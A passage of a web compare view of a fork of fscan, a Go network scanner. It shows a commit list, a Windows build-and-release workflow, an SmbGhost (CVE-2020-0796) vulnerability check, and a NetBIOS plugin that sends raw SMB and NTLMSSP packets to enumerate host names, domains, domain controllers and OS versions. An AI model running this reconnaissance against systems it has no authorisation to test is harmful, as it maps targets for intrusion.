mirror of https://github.com/qwqdanchun/fscan.git
Compare commits
259 Commits
Author | SHA1 | Date |
---|---|---|
簞純 | 032e132fca | |
簞純 | ceff8bc43e | |
簞純 | 03acc97ece | |
qwqdanchun | 6dbc03f0f3 | |
qwqdanchun | 4b885f4e43 | |
影舞者 | 4cc65afe14 | |
dksslq | 430e4e9640 | |
影舞者 | 1ce7f4e517 | |
xiaobo | 8a788427b7 | |
dksslq | db38dbdcc7 | |
dksslq | f0cb31a6d2 | |
dksslq | d151ea2c7f | |
dksslq | 7bf79b60af | |
dksslq | 5c119e97ae | |
影舞者 | 4cfe02ac2c | |
影舞者 | e14bc5ca14 | |
keacwu | 857c4c0d4b | |
影舞者 | 58890cd5e6 | |
影舞者 | 978511a7ef | |
影舞者 | c492386977 | |
影舞者 | 98300cbc9c | |
影舞者 | 0f01d63d8a | |
影舞者 | ecb0cd9e5f | |
AgeloVito | 7d77fa9016 | |
Zh0um1 | b401b896f4 | |
影舞者 | eb5558e6d9 | |
影舞者 | 79d44e00b3 | |
xiaobo | ecc362d660 | |
xiaobo | ccdaef3486 | |
影舞者 | abd2ba0947 | |
影舞者 | 6c6f522bc9 | |
影舞者 | 27c7e3977e | |
影舞者 | f8b44e37ea | |
影舞者 | 1d2fa6c470 | |
影舞者 | 384bb326c0 | |
影舞者 | 4c254b019a | |
影舞者 | 6e9b6cf2f6 | |
影舞者 | 1166e24092 | |
影舞者 | a9d05604f5 | |
影舞者 | 41f8d3abad | |
影舞者 | b1f550daaf | |
影舞者 | ae86f08432 | |
影舞者 | 3e8f23466d | |
影舞者 | 9d4d67e523 | |
xiaobo | fc416545a3 | |
kingpp | 769fc59fd1 | |
影舞者 | 38e48ba420 | |
影舞者 | 076e001217 | |
影舞者 | f981cf22e8 | |
evilAdan0s | 2e46d1adb6 | |
影舞者 | 4908720acb | |
影舞者 | 98569648bb | |
影舞者 | 9b0f12c31a | |
影舞者 | e705b33830 | |
影舞者 | 3f8fd82674 | |
影舞者 | 3ba0a2abd3 | |
影舞者 | 6f9e49a572 | |
影舞者 | c717094158 | |
影舞者 | 023fa19a48 | |
影舞者 | ed96a8dd89 | |
影舞者 | 45008bcbfc | |
影舞者 | 740ce8552a | |
影舞者 | cd423c88d1 | |
影舞者 | fe937ec056 | |
影舞者 | 30df6b651f | |
影舞者 | 6e5642c508 | |
影舞者 | 2a6491808d | |
影舞者 | 0146a941cf | |
影舞者 | 67f30bf4e3 | |
影舞者 | f2239b6c9f | |
影舞者 | b9b5eb9ce4 | |
U21H2 | 4b596180a3 | |
影舞者 | 8e1db5995e | |
影舞者 | b1d85833a7 | |
影舞者 | fdffb369c9 | |
影舞者 | a2573e10bb | |
影舞者 | 198abff115 | |
影舞者 | cf9389e879 | |
jindaxia | 85e636fcea | |
jindaxia | 2cef5c66d6 | |
影舞者 | 11fb239c61 | |
影舞者 | 4915539fb3 | |
影舞者 | 55825f3b7c | |
ccreater | c67d09371f | |
ccreater | 9f27655182 | |
影舞者 | 0b8c0ccc96 | |
影舞者 | 5bb7502ba3 | |
影舞者 | ab60c985a6 | |
ccreater | 5c112e0ca8 | |
ccreater | 6f15f835f0 | |
ccreater | d774023da7 | |
影舞者 | df527adda9 | |
影舞者 | 2d496cafc9 | |
影舞者 | 584771114d | |
影舞者 | 5dcb789e33 | |
影舞者 | bb544cfbf3 | |
影舞者 | c4950e2a93 | |
影舞者 | 4c51ae1f2a | |
影舞者 | d1ff89676d | |
影舞者 | 9527fcf0c7 | |
影舞者 | a01599ee7c | |
影舞者 | c64c64477b | |
影舞者 | 2ebda8baa9 | |
影舞者 | ed99ee0fad | |
影舞者 | 0b8e1ddaf9 | |
影舞者 | ddf824b985 | |
影舞者 | 8acb02dc30 | |
影舞者 | c594f9f350 | |
影舞者 | e24168e895 | |
影舞者 | 3b23c93c35 | |
影舞者 | c59a5c3553 | |
影舞者 | 6db53c8cea | |
影舞者 | ebf990eca0 | |
shadow1ng | 9b6596315e | |
shadow1ng | bdeaae9dcf | |
影舞者 | a56144d84a | |
影舞者 | 49a3b94c53 | |
影舞者 | c3fc054912 | |
影舞者 | 205021afec | |
影舞者 | dbb6f43fc1 | |
影舞者 | 0b22898547 | |
影舞者 | 6ce60284bc | |
影舞者 | 60cd94d459 | |
影舞者 | b80ea1316f | |
影舞者 | d1bcc60bcb | |
影舞者 | 17544b375b | |
影舞者 | edb6920622 | |
影舞者 | e1a4bfabfc | |
影舞者 | f71b4ab68f | |
dawnnnnnn | bd0bcb4b66 | |
影舞者 | b93df1ab20 | |
影舞者 | dc634f9184 | |
影舞者 | e875f4f930 | |
影舞者 | 6807508b69 | |
影舞者 | 4a34745091 | |
影舞者 | e49e6dd433 | |
影舞者 | dd00ec7bac | |
影舞者 | b06d7ac94c | |
影舞者 | 858c28724b | |
dawnnnnnn | e56713fdf0 | |
dawnnnnnn | c4446ee357 | |
影舞者 | 10d4b19897 | |
影舞者 | 21180c3da8 | |
影舞者 | 30d1e6d9ca | |
影舞者 | e9292dc7ad | |
影舞者 | 70f1c6bd71 | |
影舞者 | 5f981089a1 | |
影舞者 | dc267a5335 | |
影舞者 | 37f53e3f16 | |
影舞者 | 734f8520fc | |
影舞者 | 53df72db02 | |
影舞者 | 842ee37594 | |
影舞者 | b4e33c5127 | |
影舞者 | 0733c10a05 | |
影舞者 | 297aba6c4f | |
影舞者 | d5665f03d6 | |
影舞者 | 2e452a9695 | |
影舞者 | 07633cb24d | |
刘德华 | 5104cb9980 | |
RichardTang | 24d8cc775c | |
影舞者 | 922da8f168 | |
影舞者 | 65df3de81d | |
影舞者 | 71ff6e9a0c | |
影舞者 | dc949e25b1 | |
影舞者 | 6a4bbe3781 | |
影舞者 | c322700c6d | |
影舞者 | f64b185e6d | |
lanyi | 71024954e2 | |
影舞者 | 1499c7253a | |
shadow1ng | d38e38e17a | |
Les1ie | ddb5a9f228 | |
影舞者 | ceb585d018 | |
canc3s | 3d3ecac605 | |
shadow1ng | 1437ac60ff | |
shadow1ng | c8ec4eab79 | |
shadow1ng | 80fe8548c1 | |
shadow1ng | ad1c53e3f4 | |
shadow1ng | a8835a9fe4 | |
影舞者 | db8acb2828 | |
影舞者 | 288338bc9d | |
影舞者 | 0743e4cb68 | |
影舞者 | 6cdf1e19dc | |
canc3s | a427833e3f | |
影舞者 | d974523d88 | |
shadow1ng | c90c9272f0 | |
影舞者 | a9e78b6de3 | |
7TEN7 | ca1e0c791c | |
shadow1ng | 90ef895e0f | |
shadow1ng | 162d1dd3a3 | |
shadow1ng | f3b0c4a6d2 | |
shadow1ng | 936c1f5395 | |
shadow1ng | 9d385eb26a | |
shadow1ng | 61e814119d | |
shadow1ng | f5c9667f91 | |
shadow1ng | 4f3ff608ab | |
shadow1ng | 0dd41e2917 | |
shadow1ng | 7031d78439 | |
shadow1ng | 4431b42b35 | |
shadow1ng | b6133c4a55 | |
shadow1ng | ef6a196de7 | |
shadow1ng | cd53258f0d | |
shadow1ng | 93245a16d0 | |
shadow1ng | 79aa24fc8f | |
shadow1ng | 9aba1c88a3 | |
shadow1ng | 400f4373c9 | |
shadow1ng | 402add56c7 | |
shadow1ng | 7294051b44 | |
shadow1ng | f1163fc3d7 | |
shadow1ng | 2466fc3ea7 | |
shadow1ng | e2eba97114 | |
shadow1ng | fcbebab2ca | |
shadow1ng | ab31738807 | |
shadow1ng | 6bca014fda | |
shadow1ng | 27324dc4a5 | |
shadow1ng | 323d786c66 | |
shadow1ng | 78fb5339e6 | |
shadow1ng | 0d4299c23d | |
shadow1ng | 064617d93c | |
shadow1ng | 5537eb8b80 | |
shadow1ng | 067322203d | |
shadow1ng | 7f2f7df67e | |
shadow1ng | 6fae8bf277 | |
shadow1ng | f4b6ecc363 | |
shadow1ng | 559d6c7c4b | |
shadow1ng | 7535fdace7 | |
shadow1ng | d6e8d37ce8 | |
shadow1ng | e43a7f5610 | |
shadow1ng | 05d746bec4 | |
shadow1ng | f7989d84bf | |
shadow1ng | d503f55693 | |
shadow1ng | e866d68f10 | |
shadow1ng | bb3222451c | |
shadow1ng | 764e7723e1 | |
shadow1ng | 66cd740580 | |
shadow1ng | 41ec4489da | |
shadow1ng | 6ed5967705 | |
shadow1ng | d311d8cb79 | |
shadow1ng | 3ca56ff222 | |
影舞者 | 5b330bb12d | |
7TEN7 | 089502eb52 | |
shadow1ng | 34706e6bca | |
shadow1ng | ba85e2178e | |
shadow1ng | 5e7def5085 | |
影舞者 | 423c0bebea | |
Neal Caffery | f3a3dd2f8c | |
madneal | ae2a4621d4 | |
影舞者 | d79194389d | |
Doctor_Who丶Max | 86b91c1c2e | |
影舞者 | 5c000b2ffc | |
madneal | 2ed5948d08 | |
madneal | eb4cece0f9 | |
madneal | 021592c237 | |
shadow1ng | 8664cf3833 | |
shadow1ng | 41deddb132 | |
shadow1ng | 0df4e314d1 | |
shadow1ng | 79ea046ed2 | |
shadow1ng | db5023c4c4 | |
shadow1ng | 51b8b2c0e2 | |
shadow1ng | 583e51d479 |
|
@ -0,0 +1,53 @@
|
|||
name: Go-AutoBuild
|
||||
|
||||
on:
|
||||
push:
|
||||
branches: [ "main" ]
|
||||
pull_request:
|
||||
branches: [ "main" ]
|
||||
|
||||
jobs:
|
||||
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Build
|
||||
run: CGO_ENABLED=0 GOOS=windows GOARCH=386 go build -ldflags="-s -w" -trimpath main.go
|
||||
|
||||
- name: Delete-tag-and-release
|
||||
uses: dev-drprasad/delete-tag-and-release@v1.0
|
||||
with:
|
||||
delete_release: true # default: false
|
||||
tag_name: AutoBuild # tag name to delete
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: Create Release
|
||||
id: create_release
|
||||
uses: actions/create-release@latest
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
tag_name: AutoBuild
|
||||
release_name: AutoBuild
|
||||
body: ${{ steps.changelog.outputs.changelog }}
|
||||
draft: false
|
||||
prerelease: false
|
||||
|
||||
- name: Upload Release Asset
|
||||
id: upload-release-asset
|
||||
uses: actions/upload-release-asset@v1
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
upload_url: ${{ steps.create_release.outputs.upload_url }}
|
||||
asset_path: ./main.exe
|
||||
asset_name: fscan32.exe
|
||||
asset_content_type: application/exe
|
|
@ -0,0 +1,21 @@
|
|||
MIT License
|
||||
|
||||
Copyright (c) 2021 shadow1ng
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
|
@ -3,10 +3,9 @@ package Plugins
|
|||
import (
|
||||
"bytes"
|
||||
"fmt"
|
||||
"net"
|
||||
"time"
|
||||
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"example.com/fxscan/common"
|
||||
)
|
||||
|
||||
const (
|
||||
|
@ -96,14 +95,22 @@ const (
|
|||
)
|
||||
|
||||
func SmbGhost(info *common.HostInfo) error {
|
||||
if common.IsBrute {
|
||||
return nil
|
||||
}
|
||||
err := SmbGhostScan(info)
|
||||
return err
|
||||
}
|
||||
|
||||
func SmbGhostScan(info *common.HostInfo) error {
|
||||
ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
|
||||
addr := fmt.Sprintf("%s:%d", info.Host, port)
|
||||
conn, err := net.DialTimeout("tcp", addr, timeout)
|
||||
ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second
|
||||
addr := fmt.Sprintf("%s:%v", info.Host, port)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
@ -117,9 +124,8 @@ func SmbGhostScan(info *common.HostInfo) error {
|
|||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer conn.Close()
|
||||
if bytes.Contains(buff[:n], []byte("Public")) == true {
|
||||
result := fmt.Sprintf("%v CVE-2020-0796 SmbGhost Vulnerable", ip)
|
||||
result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip)
|
||||
common.LogSuccess(result)
|
||||
|
||||
}
|
||||
|
|
|
@ -0,0 +1,375 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"errors"
|
||||
"fmt"
|
||||
"example.com/fxscan/common"
|
||||
"gopkg.in/yaml.v3"
|
||||
"net"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
var netbioserr = errors.New("netbios error")
|
||||
|
||||
func NetBIOS(info *common.HostInfo) error {
|
||||
netbios, _ := NetBIOS1(info)
|
||||
output := netbios.String()
|
||||
if len(output) > 0 {
|
||||
result := fmt.Sprintf("[*] NetBios: %-15s %s", info.Host, output)
|
||||
common.LogSuccess(result)
|
||||
return nil
|
||||
}
|
||||
return netbioserr
|
||||
}
|
||||
|
||||
func NetBIOS1(info *common.HostInfo) (netbios NetBiosInfo, err error) {
|
||||
netbios, err = GetNbnsname(info)
|
||||
var payload0 []byte
|
||||
if netbios.ServerService != "" || netbios.WorkstationService != "" {
|
||||
ss := netbios.ServerService
|
||||
if ss == "" {
|
||||
ss = netbios.WorkstationService
|
||||
}
|
||||
name := netbiosEncode(ss)
|
||||
payload0 = append(payload0, []byte("\x81\x00\x00D ")...)
|
||||
payload0 = append(payload0, name...)
|
||||
payload0 = append(payload0, []byte("\x00 EOENEBFACACACACACACACACACACACACA\x00")...)
|
||||
}
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
var conn net.Conn
|
||||
conn, err = common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
if info.Ports == "139" && len(payload0) > 0 {
|
||||
_, err1 := conn.Write(payload0)
|
||||
if err1 != nil {
|
||||
return
|
||||
}
|
||||
_, err1 = ReadBytes(conn)
|
||||
if err1 != nil {
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
_, err = conn.Write(NegotiateSMBv1Data1)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
_, err = ReadBytes(conn)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
_, err = conn.Write(NegotiateSMBv1Data2)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
var ret []byte
|
||||
ret, err = ReadBytes(conn)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
netbios2, err := ParseNTLM(ret)
|
||||
JoinNetBios(&netbios, &netbios2)
|
||||
return
|
||||
}
|
||||
|
||||
func GetNbnsname(info *common.HostInfo) (netbios NetBiosInfo, err error) {
|
||||
senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
|
||||
//senddata1 := []byte("ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01")
|
||||
realhost := fmt.Sprintf("%s:137", info.Host)
|
||||
conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
_, err = conn.Write(senddata1)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
text, _ := ReadBytes(conn)
|
||||
netbios, err = ParseNetBios(text)
|
||||
return
|
||||
}
|
||||
|
||||
func bytetoint(text byte) (int, error) {
|
||||
num1 := fmt.Sprintf("%v", text)
|
||||
num, err := strconv.Atoi(num1)
|
||||
return num, err
|
||||
}
|
||||
|
||||
func netbiosEncode(name string) (output []byte) {
|
||||
var names []int
|
||||
src := fmt.Sprintf("%-16s", name)
|
||||
for _, a := range src {
|
||||
char_ord := int(a)
|
||||
high_4_bits := char_ord >> 4
|
||||
low_4_bits := char_ord & 0x0f
|
||||
names = append(names, high_4_bits, low_4_bits)
|
||||
}
|
||||
for _, one := range names {
|
||||
out := (one + 0x41)
|
||||
output = append(output, byte(out))
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
var (
|
||||
UNIQUE_NAMES = map[string]string{
|
||||
"\x00": "WorkstationService",
|
||||
"\x03": "Messenger Service",
|
||||
"\x06": "RAS Server Service",
|
||||
"\x1F": "NetDDE Service",
|
||||
"\x20": "ServerService",
|
||||
"\x21": "RAS Client Service",
|
||||
"\xBE": "Network Monitor Agent",
|
||||
"\xBF": "Network Monitor Application",
|
||||
"\x1D": "Master Browser",
|
||||
"\x1B": "Domain Master Browser",
|
||||
}
|
||||
|
||||
GROUP_NAMES = map[string]string{
|
||||
"\x00": "DomainName",
|
||||
"\x1C": "DomainControllers",
|
||||
"\x1E": "Browser Service Elections",
|
||||
}
|
||||
|
||||
NetBIOS_ITEM_TYPE = map[string]string{
|
||||
"\x01\x00": "NetBiosComputerName",
|
||||
"\x02\x00": "NetBiosDomainName",
|
||||
"\x03\x00": "ComputerName",
|
||||
"\x04\x00": "DomainName",
|
||||
"\x05\x00": "DNS tree name",
|
||||
"\x07\x00": "Time stamp",
|
||||
}
|
||||
NegotiateSMBv1Data1 = []byte{
|
||||
0x00, 0x00, 0x00, 0x85, 0xFF, 0x53, 0x4D, 0x42, 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xC8,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4E, 0x45, 0x54, 0x57, 0x4F,
|
||||
0x52, 0x4B, 0x20, 0x50, 0x52, 0x4F, 0x47, 0x52, 0x41, 0x4D, 0x20, 0x31, 0x2E, 0x30, 0x00, 0x02,
|
||||
0x4C, 0x41, 0x4E, 0x4D, 0x41, 0x4E, 0x31, 0x2E, 0x30, 0x00, 0x02, 0x57, 0x69, 0x6E, 0x64, 0x6F,
|
||||
0x77, 0x73, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x57, 0x6F, 0x72, 0x6B, 0x67, 0x72, 0x6F, 0x75, 0x70,
|
||||
0x73, 0x20, 0x33, 0x2E, 0x31, 0x61, 0x00, 0x02, 0x4C, 0x4D, 0x31, 0x2E, 0x32, 0x58, 0x30, 0x30,
|
||||
0x32, 0x00, 0x02, 0x4C, 0x41, 0x4E, 0x4D, 0x41, 0x4E, 0x32, 0x2E, 0x31, 0x00, 0x02, 0x4E, 0x54,
|
||||
0x20, 0x4C, 0x4D, 0x20, 0x30, 0x2E, 0x31, 0x32, 0x00,
|
||||
}
|
||||
NegotiateSMBv1Data2 = []byte{
|
||||
0x00, 0x00, 0x01, 0x0A, 0xFF, 0x53, 0x4D, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
|
||||
0x00, 0x00, 0x40, 0x00, 0x0C, 0xFF, 0x00, 0x0A, 0x01, 0x04, 0x41, 0x32, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x4A, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD4, 0x00, 0x00, 0xA0, 0xCF, 0x00, 0x60,
|
||||
0x48, 0x06, 0x06, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x02, 0xA0, 0x3E, 0x30, 0x3C, 0xA0, 0x0E, 0x30,
|
||||
0x0C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0A, 0xA2, 0x2A, 0x04,
|
||||
0x28, 0x4E, 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x82, 0x08,
|
||||
0xA2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x05, 0x02, 0xCE, 0x0E, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00,
|
||||
0x64, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,
|
||||
0x76, 0x00, 0x65, 0x00, 0x72, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x33, 0x00,
|
||||
0x20, 0x00, 0x33, 0x00, 0x37, 0x00, 0x39, 0x00, 0x30, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,
|
||||
0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,
|
||||
0x63, 0x00, 0x6B, 0x00, 0x20, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,
|
||||
0x6E, 0x00, 0x64, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,
|
||||
0x72, 0x00, 0x76, 0x00, 0x65, 0x00, 0x72, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,
|
||||
0x33, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2E, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
}
|
||||
)
|
||||
|
||||
type NetBiosInfo struct {
|
||||
GroupName string
|
||||
WorkstationService string `yaml:"WorkstationService"`
|
||||
ServerService string `yaml:"ServerService"`
|
||||
DomainName string `yaml:"DomainName"`
|
||||
DomainControllers string `yaml:"DomainControllers"`
|
||||
ComputerName string `yaml:"ComputerName"`
|
||||
OsVersion string `yaml:"OsVersion"`
|
||||
NetDomainName string `yaml:"NetBiosDomainName"`
|
||||
NetComputerName string `yaml:"NetBiosComputerName"`
|
||||
}
|
||||
|
||||
func (info *NetBiosInfo) String() (output string) {
|
||||
var text string
|
||||
//ComputerName 信息比较全
|
||||
if info.ComputerName != "" {
|
||||
if !strings.Contains(info.ComputerName, ".") && info.GroupName != "" {
|
||||
text = fmt.Sprintf("%s\\%s", info.GroupName, info.ComputerName)
|
||||
} else {
|
||||
text = info.ComputerName
|
||||
}
|
||||
} else {
|
||||
//组信息
|
||||
if info.DomainName != "" {
|
||||
text += info.DomainName
|
||||
text += "\\"
|
||||
} else if info.NetDomainName != "" {
|
||||
text += info.NetDomainName
|
||||
text += "\\"
|
||||
}
|
||||
//机器名
|
||||
if info.ServerService != "" {
|
||||
text += info.ServerService
|
||||
} else if info.WorkstationService != "" {
|
||||
text += info.WorkstationService
|
||||
} else if info.NetComputerName != "" {
|
||||
text += info.NetComputerName
|
||||
}
|
||||
}
|
||||
if text == "" {
|
||||
} else if info.DomainControllers != "" {
|
||||
output = fmt.Sprintf("[+] DC:%-24s", text)
|
||||
} else {
|
||||
output = fmt.Sprintf("%-30s", text)
|
||||
}
|
||||
if info.OsVersion != "" {
|
||||
output += " " + info.OsVersion
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
func ParseNetBios(input []byte) (netbios NetBiosInfo, err error) {
|
||||
if len(input) < 57 {
|
||||
err = netbioserr
|
||||
return
|
||||
}
|
||||
data := input[57:]
|
||||
var num int
|
||||
num, err = bytetoint(input[56:57][0])
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
var msg string
|
||||
for i := 0; i < num; i++ {
|
||||
if len(data) < 18*i+16 {
|
||||
break
|
||||
}
|
||||
name := string(data[18*i : 18*i+15])
|
||||
flag_bit := data[18*i+15 : 18*i+16]
|
||||
if GROUP_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
|
||||
msg += fmt.Sprintf("%s: %s\n", GROUP_NAMES[string(flag_bit)], name)
|
||||
} else if UNIQUE_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
|
||||
msg += fmt.Sprintf("%s: %s\n", UNIQUE_NAMES[string(flag_bit)], name)
|
||||
} else if string(flag_bit) == "\x00" || len(data) >= 18*i+18 {
|
||||
name_flags := data[18*i+16 : 18*i+18][0]
|
||||
if name_flags >= 128 {
|
||||
msg += fmt.Sprintf("%s: %s\n", GROUP_NAMES[string(flag_bit)], name)
|
||||
} else {
|
||||
msg += fmt.Sprintf("%s: %s\n", UNIQUE_NAMES[string(flag_bit)], name)
|
||||
}
|
||||
} else {
|
||||
msg += fmt.Sprintf("%s \n", name)
|
||||
}
|
||||
}
|
||||
if len(msg) == 0 {
|
||||
err = netbioserr
|
||||
return
|
||||
}
|
||||
err = yaml.Unmarshal([]byte(msg), &netbios)
|
||||
if netbios.DomainName != "" {
|
||||
netbios.GroupName = netbios.DomainName
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
func ParseNTLM(ret []byte) (netbios NetBiosInfo, err error) {
|
||||
if len(ret) < 47 {
|
||||
err = netbioserr
|
||||
return
|
||||
}
|
||||
var num1, num2 int
|
||||
num1, err = bytetoint(ret[43:44][0])
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
num2, err = bytetoint(ret[44:45][0])
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
length := num1 + num2*256
|
||||
if len(ret) < 48+length {
|
||||
return
|
||||
}
|
||||
os_version := ret[47+length:]
|
||||
tmp1 := bytes.ReplaceAll(os_version, []byte{0x00, 0x00}, []byte{124})
|
||||
tmp1 = bytes.ReplaceAll(tmp1, []byte{0x00}, []byte{})
|
||||
ostext := string(tmp1[:len(tmp1)-1])
|
||||
ss := strings.Split(ostext, "|")
|
||||
netbios.OsVersion = ss[0]
|
||||
start := bytes.Index(ret, []byte("NTLMSSP"))
|
||||
if len(ret) < start+45 {
|
||||
return
|
||||
}
|
||||
num1, err = bytetoint(ret[start+40 : start+41][0])
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
num2, err = bytetoint(ret[start+41 : start+42][0])
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
length = num1 + num2*256
|
||||
num1, err = bytetoint(ret[start+44 : start+45][0])
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
offset, err := bytetoint(ret[start+44 : start+45][0])
|
||||
if err != nil || len(ret) < start+offset+length {
|
||||
return
|
||||
}
|
||||
var msg string
|
||||
index := start + offset
|
||||
for index < start+offset+length {
|
||||
item_type := ret[index : index+2]
|
||||
num1, err = bytetoint(ret[index+2 : index+3][0])
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
num2, err = bytetoint(ret[index+3 : index+4][0])
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
item_length := num1 + num2*256
|
||||
item_content := bytes.ReplaceAll(ret[index+4:index+4+item_length], []byte{0x00}, []byte{})
|
||||
index += 4 + item_length
|
||||
if string(item_type) == "\x07\x00" {
|
||||
//Time stamp, 不需要输出
|
||||
} else if NetBIOS_ITEM_TYPE[string(item_type)] != "" {
|
||||
msg += fmt.Sprintf("%s: %s\n", NetBIOS_ITEM_TYPE[string(item_type)], string(item_content))
|
||||
} else if string(item_type) == "\x00\x00" {
|
||||
break
|
||||
}
|
||||
}
|
||||
err = yaml.Unmarshal([]byte(msg), &netbios)
|
||||
return
|
||||
}
|
||||
|
||||
func JoinNetBios(netbios1, netbios2 *NetBiosInfo) *NetBiosInfo {
|
||||
netbios1.ComputerName = netbios2.ComputerName
|
||||
